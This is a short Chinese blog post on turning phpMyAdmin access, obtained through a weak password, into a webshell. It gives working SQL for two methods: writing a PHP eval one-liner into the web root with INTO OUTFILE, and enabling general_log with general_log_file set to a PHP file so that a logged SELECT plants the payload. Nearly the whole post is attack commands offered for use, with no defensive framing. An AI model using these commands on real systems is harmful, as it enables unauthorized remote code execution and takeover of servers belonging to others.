【Web安全】拿到phpMyAdmin如何获取权限

文章目录

通过弱口令拿到进到phpMyAdmin页面如何才能获取权限

1、outfile写一句话

尝试执行outfile语句写入一句话木马

mysql 复制代码
select "<?php @eval($_REQUEST[6868])?>"  into outfile "C:\\phpStudy\\WWW\\phpadmin.php";

如果执行失败show variables like "%secure%"; 查看配置

2、general_log_file写一句话

查看general_log是否开启

通过show global variables like "%genera%";查看

执行set global general_log="on";打开

通过generali_log_file写入一句话木马

复制代码
set global general_log_file="网站绝对路径/文件名";
mysql 复制代码
SELECT "<?php @eval($_POST[1])?>"

general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。

相关推荐
每次的天空27 分钟前
Android-自定义View的实战学习总结
android·学习·kotlin·音视频
恋猫de小郭1 小时前
Flutter Widget Preview 功能已合并到 master,提前在体验毛坯的预览支持
android·flutter·ios
你不知道我是谁?1 小时前
AI 应用于进攻性安全
人工智能·安全
断剑重铸之日2 小时前
Android自定义相机开发(类似OCR扫描相机)
android
随心最为安2 小时前
Android Library Maven 发布完整流程指南
android
岁月玲珑2 小时前
【使用Android Studio调试手机app时候手机老掉线问题】
android·ide·android studio
薄荷椰果抹茶2 小时前
【网络安全基础】第一章---引言
安全·网络安全
zskj_zhyl3 小时前
智绅科技:以科技为翼,构建养老安全守护网
人工智能·科技·安全
zsq4 小时前
【网络与系统安全】域类实施模型DTE
网络·安全·系统安全
缘友一世6 小时前
网安系列【4】之OWASP与OWASP Top 10:Web安全入门指南
安全·web安全